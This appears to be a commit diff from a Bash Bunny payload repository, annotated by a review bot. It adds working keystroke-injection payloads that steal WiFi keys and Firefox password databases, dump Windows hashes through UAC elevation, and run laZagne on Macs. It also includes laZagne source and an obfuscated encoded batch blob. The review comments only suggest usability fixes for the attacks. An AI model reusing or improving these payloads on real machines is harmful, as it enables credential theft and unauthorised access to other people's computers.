# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
**LED meanings**
|
||||
- Magenta: Initial setup – about 1 – 3 seconds
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid, then off: Attack complete
|
|
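Review bot: the HOW TO USE PASSWORD DB step tells the reader to copy `KEY4.DB AND LOGINS.JSON` into their own `%APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE`, which overwrites the operator's own saved logins and key database. Recommend a throwaway profile (`firefox -P`, or `-profile <dir>`) or an offline decoder instead, and mention that if the victim set a primary password the copied `key4.db` still needs it. Also `Loot is saved in Payloads/switch#/loot` sits under KNOWN ISSUES but reads as intended behaviour; either move it to Setup or say why it is an issue (the loot lands on the udisk next to the payload rather than under /loot, so it is lost if the payload folder is overwritten).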
@ -0,0 +1,78 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Magenta: Initial setup – about 1 – 3 seconds
|
||||
# Single yellow blink: Attack in progress
|
||||
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
||||
|
||||
# Options
|
||||
# -------
|
||||
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
|
||||
BB_NAME="BashBunny"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Attack
|
||||
# ------
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 500
|
||||
LED ATTACK
|
||||
Q DELAY 100
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING powershell Start-Process powershell
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
|
||||
Q ENTER
|
||||
Q DELAY 8000
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
|
|
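Review bot: `BB_NAME="BashBunny"` is presented as the configurable volume label but is never used; the `iex((gwmi win32_volume -f 'label=''BashBunny''').Name+...)` line hard-codes the label, so interpolate `$BB_NAME` there (the STRING is already in double quotes, so `label=''$BB_NAME''` expands on the Bunny) or drop the option. The timing is also fixed: `Q DELAY 7000` before the iex and `Q DELAY 8000` after it are guesses that the header comments admit to, and since the payload runs in `ATTACKMODE HID STORAGE` the .bat could touch a marker file on the udisk when it finishes and the payload could poll for it rather than sleep. Finally `shutdown now` 1.5 s after `LED FINISH` means the green LED is barely visible and the device powers itself off; the README's "Bash Bunny may be removed" should say so.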
@ -0,0 +1,20 @@
|
|||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
|
||||
|
||||
#
|
||||
**!Depending on your Windows version, this might not work as intended!**
|
||||
#
|
||||
**Instruction:**
|
||||
|
||||
Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
After Width: | Height: | Size: 13 KiB |
|
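Review bot: shipping `BunnyDump.bat` only as a multi-layer obfuscated blob is a supply-chain problem for the people you are asking to run it as administrator. `If you don't trust this obfuscated .bat file, you should run it within a save space first` pushes the review onto every user, and a sandbox run cannot show what it does on other Windows versions (the README itself warns it `might not work as intended`). Please commit the readable source of the .bat (and the obfuscation step, if it matters for AV evasion) so this hunk can be reviewed like the other payloads. Minor: `save space` should be `safe space`, `**Instruction:**` appears twice, and `Exfiltrate the out.txt file` is stale, since the payload already moves out.txt into `\loot` on the udisk and ejects the drive; say that the hashes are in the loot folder.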
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
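Review bot: the payload is tied to a German target without saying so. `DUCKY_LANG de` selects the keymap and `Q ALT j` accepts the UAC consent prompt via the `Ja` accelerator, so on an English system the hotkey does nothing and the elevated PowerShell never opens; make the language a documented option at the top (`DUCKY_LANG ${DUCKY_LANG:-de}`) and derive the UAC accept key from it (`Q ALT y` on English layouts). Also `RUN WIN "powershell Start-Process powershell -Verb runAs"` already submits the Run dialog, so the following `Q ENTER` lands on whatever has focus next, typically the UAC prompt; remove it or replace it with a delay. The README for this payload should carry the locale requirement, since it currently only says results depend on the Windows version.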
@ -28,7 +28,7 @@ mkdir -p $LOOTDIR
|
|||
|
||||
MSF_DIR=/tools/metasploit-framework
|
||||
|
||||
# Save environment informaiton:
|
||||
# Save environment information:
|
||||
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
|
||||
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
|
||||
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
|
||||
|
|
|
@ -26,7 +26,9 @@ Uses ethernet to attempt dictionary attacks against passwords. When the password
|
|||
To clear a stored password move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.
|
||||
|
||||
## Configuration
|
||||
No initial configuration is required for bunny firmware v1.6+.
|
||||
You must have a Metasploit installation up and running in path /tools/metasploit-framework/
|
||||
Information and instructions for the installation of additional tools to the Bash Bunny can be found [here](https://docs.hak5.org/hc/en-us/articles/360010554133-Installing-and-using-additional-tools).
|
||||
No further initial configuration is required for Firmware v1.6+.
|
||||
|
||||
### Per attack configuration
|
||||
1. userlist.txt contains usernames to use in attack.
|
||||
|
|
|
@ -0,0 +1,238 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# !/usr/bin/python
|
||||
|
||||
##############################################################################
|
||||
# #
|
||||
# By Alessandro ZANNI #
|
||||
# #
|
||||
##############################################################################
|
||||
|
||||
# Disclaimer: Do Not Use this program for illegal purposes ;)
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
import os
|
||||
import time
|
||||
|
||||
# Configuration
|
||||
from lazagne.config.write_output import write_in_file, StandardOutput
|
||||
from lazagne.config.manage_modules import get_categories
|
||||
from lazagne.config.constant import constant
|
||||
from lazagne.config.run import run_lazagne, create_module_dic
|
||||
|
||||
|
||||
# Object used to manage the output / write functions (cf write_output file)
|
||||
constant.st = StandardOutput()
|
||||
modules = create_module_dic()
|
||||
|
||||
|
||||
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
|
||||
if output_dir:
|
||||
if os.path.isdir(output_dir):
|
||||
constant.folder_name = output_dir
|
||||
else:
|
||||
print('[!] Specify a directory, not a file !')
|
||||
|
||||
if txt_format:
|
||||
constant.output = 'txt'
|
||||
|
||||
if json_format:
|
||||
constant.output = 'json'
|
||||
|
||||
if all_format:
|
||||
constant.output = 'all'
|
||||
|
||||
if constant.output:
|
||||
if not os.path.exists(constant.folder_name):
|
||||
os.makedirs(constant.folder_name)
|
||||
# constant.file_name_results = 'credentials' # let the choice of the name to the user
|
||||
|
||||
if constant.output != 'json':
|
||||
constant.st.write_header()
|
||||
|
||||
|
||||
def quiet_mode(is_quiet_mode=False):
|
||||
if is_quiet_mode:
|
||||
constant.quiet_mode = True
|
||||
|
||||
|
||||
def verbosity(verbose=0):
|
||||
# Write on the console + debug file
|
||||
if verbose == 0:
|
||||
level = logging.CRITICAL
|
||||
elif verbose == 1:
|
||||
level = logging.INFO
|
||||
elif verbose >= 2:
|
||||
level = logging.DEBUG
|
||||
|
||||
formatter = logging.Formatter(fmt='%(message)s')
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(formatter)
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
# If other logging are set
|
||||
for r in root.handlers:
|
||||
r.setLevel(logging.CRITICAL)
|
||||
root.addHandler(stream)
|
||||
|
||||
|
||||
def manage_advanced_options(user_password=None, dictionary_attack=None):
|
||||
if user_password:
|
||||
constant.user_password = user_password
|
||||
|
||||
if dictionary_attack:
|
||||
constant.dictionary_attack = dictionary_attack
|
||||
|
||||
|
||||
def clean_args(arg):
|
||||
"""
|
||||
Remove not necessary values to get only subcategories
|
||||
"""
|
||||
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
|
||||
try:
|
||||
del arg[i]
|
||||
except Exception:
|
||||
pass
|
||||
return arg
|
||||
|
||||
|
||||
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
|
||||
"""
|
||||
This function will be removed, still there for compatibility with other tools
|
||||
Everything is on the config/run.py file
|
||||
"""
|
||||
for pwd_dic in run_lazagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=password,
|
||||
interactive=interactive
|
||||
):
|
||||
yield pwd_dic
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
|
||||
help='laZagne version')
|
||||
|
||||
# ------------------------------------------- Permanent options ------------------------------------------
|
||||
# Version and verbosity
|
||||
PPoptional = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PPoptional._optionals.title = 'optional arguments'
|
||||
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
|
||||
help='will prompt a window to the user')
|
||||
PPoptional.add_argument('-password', dest='password', action='store',
|
||||
help='user password used to decrypt the keychain')
|
||||
PPoptional.add_argument('-attack', dest='attack', action='store_true',
|
||||
help='500 well known passwords used to check the user hash (could take a while)')
|
||||
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
|
||||
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
|
||||
help='quiet mode: nothing is printed to the output', default=False, )
|
||||
|
||||
# Output
|
||||
PWrite = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PWrite._optionals.title = 'Output'
|
||||
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
|
||||
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
|
||||
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
|
||||
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
|
||||
default='.')
|
||||
|
||||
# -------------------------------- Add options and suboptions to all modules ------------------------------
|
||||
all_subparser = []
|
||||
categories = get_categories()
|
||||
for c in categories:
|
||||
categories[c]['parser'] = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
categories[c]['parser']._optionals.title = categories[c]['help']
|
||||
|
||||
# Manage options
|
||||
categories[c]['subparser'] = []
|
||||
for module in modules[c]:
|
||||
m = modules[c][module]
|
||||
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
|
||||
help=m.options['help'])
|
||||
|
||||
# Manage all sub options by modules
|
||||
if m.suboptions:
|
||||
tmp = []
|
||||
for sub in m.suboptions:
|
||||
tmp_subparser = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
tmp_subparser._optionals.title = sub['title']
|
||||
if 'type' in sub:
|
||||
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
|
||||
dest=sub['dest'], help=sub['help'])
|
||||
else:
|
||||
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
|
||||
help=sub['help'])
|
||||
tmp.append(tmp_subparser)
|
||||
all_subparser.append(tmp_subparser)
|
||||
categories[c]['subparser'] += tmp
|
||||
|
||||
# ------------------------------------------- Print all -------------------------------------------
|
||||
parents = [PPoptional] + all_subparser + [PWrite]
|
||||
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
|
||||
for c in categories:
|
||||
parser_tab = [PPoptional, categories[c]['parser']]
|
||||
if 'subparser' in categories[c]:
|
||||
if categories[c]['subparser']:
|
||||
parser_tab += categories[c]['subparser']
|
||||
parser_tab += [PWrite]
|
||||
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
|
||||
dic = dict(list(dic.items()) + list(dic_tmp.items()))
|
||||
|
||||
subparsers = parser.add_subparsers(help='Choose a main command')
|
||||
for d in dic:
|
||||
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
|
||||
|
||||
# ------------------------------------------- Parse arguments -------------------------------------------
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = dict(parser.parse_args()._get_kwargs())
|
||||
arguments = parser.parse_args()
|
||||
|
||||
# Define constant variables
|
||||
output(
|
||||
output_dir=args['output'],
|
||||
txt_format=args['write_normal'],
|
||||
json_format=args['write_json'],
|
||||
all_format=args['write_all']
|
||||
)
|
||||
verbosity(verbose=args['verbose'])
|
||||
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
|
||||
quiet_mode(is_quiet_mode=args['quiet'])
|
||||
|
||||
# Print the title
|
||||
constant.st.first_title()
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
category_selected = args['auditType']
|
||||
subcategories = clean_args(args)
|
||||
|
||||
for r in runLaZagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=args.get('password', None),
|
||||
interactive=arguments.interactive
|
||||
):
|
||||
pass
|
||||
|
||||
write_in_file(constant.stdout_result)
|
||||
constant.st.print_footer(elapsed_time=str(time.time() - start_time))
|
|
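Review bot: the argument parsing at the end of this hunk runs `parser.parse_args()` twice (`args = dict(parser.parse_args()._get_kwargs())` followed by `arguments = parser.parse_args()`), and the first call relies on the private `Namespace._get_kwargs()` method; parse once and derive the dict with `vars(arguments)`. The `-password` option (`user password used to decrypt the keychain`) is consumed straight from argv and handed to `manage_advanced_options(user_password=args.get('password', None), ...)`, so any caller that types it on a command line, as the payload.txt later in this commit does, exposes it on screen, in the process listing and potentially in shell history; the help text should say so, or point users at the existing `-i`/`--interactive` prompt instead.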
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Mac Password Grabber
|
||||
# Author: Overtimedev
|
||||
# Version: 1.0
|
||||
#
|
||||
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
||||
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Green..............Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
lootdir=loot/MacPass
|
||||
mkdir -p /root/udisk/$lootdir
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING cd /Volumes/BashBunny/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING python get-pip.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING pip install -r requirements.txt
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
||||
QUACK ENTER
|
||||
QUACK DELAY 10000
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
|
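Review bot: the `QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass` line types the account password in cleartext into the target's Terminal, where it is visible on screen and can end up in the shell history, and the fixed `QUACK DELAY 3000` after `pip install -r requirements.txt` and `QUACK DELAY 10000` before `killall Terminal` are unchecked guesses: on a slow or offline machine (pip needs network access, and `get-pip.py` against the system Python needs write permission it will not have without sudo) the install or the dump is cut off and `loot/MacPass` stays empty. State these prerequisites and the delay assumptions in the header comments. The header also has a stray `s` in `# s(Replace PASSWORD, ...)`, `vicims` should read `victim's`, and the reason `mkdir -p /root/udisk/$lootdir` and `-output loot/MacPass` refer to the same directory (the typed `cd /Volumes/BashBunny/` puts the relative path on the Bunny's storage) deserves a comment.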
@ -0,0 +1,25 @@
|
|||
# Mac Password Grabber for the BashBunny
|
||||
|
||||
* Author: Overtimedev
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
|
||||
|
||||
|
||||
|
||||
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
|
||||
|
||||
2. unzip lazagne.zip into the root folder of the bunny
|
||||
|
||||
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Amber | Executin Payload |
|
||||
| Green | Attack Finished |
|
|
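Review bot: the setup steps do not match the payload: step 1 lists `get-pip.py, laZagne.py and requirements.txt` and step 2 says `unzip lazagne.zip`, but no `lazagne.zip` is part of this commit, and the `laZagne.py` entry point shown earlier depends on code outside that one file (`constant`, `get_categories`, `runLaZagne`), so say which archive is meant and where it comes from. The description says loot lands in `/loot/MacPass` while payload.txt writes to `/root/udisk/loot/MacPass`; use one path. Typos: `vicims` should be `victim's` and `Executin Payload` should be `Executing Payload`.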
@ -0,0 +1,8 @@
|
|||
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
pyasn1
|
||||
enum34; python_version < '3.4' and sys_platform == 'win32'
|
||||
rsa; sys_platform == 'win32'
|
||||
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
|
||||
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
|
||||
pycryptodome
|
|
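Review bot: the two pypykatz lines install `archive/master.zip` from two different GitHub accounts (`AlessandroZ` for `python_version < '3.4'`, `skelsec` for `python_version > '3.5'`) with no version pin or hash, so whatever happens to be on those branches at install time gets pulled in and executed, and Python 3.4 and 3.5 match neither marker. Pin each to a tagged release or commit (with a `--hash`) and close the gap with `>= '3.4'`. Note also that on the macOS target of this payload every entry with a `sys_platform` marker evaluates false, so the `pip install -r requirements.txt` step only installs `pyasn1` and `pycryptodome`; the README should say that.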
@ -0,0 +1,2 @@
|
|||
挦獬
|
||||
潰敷獲敨汬攮數ⴠ湥䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁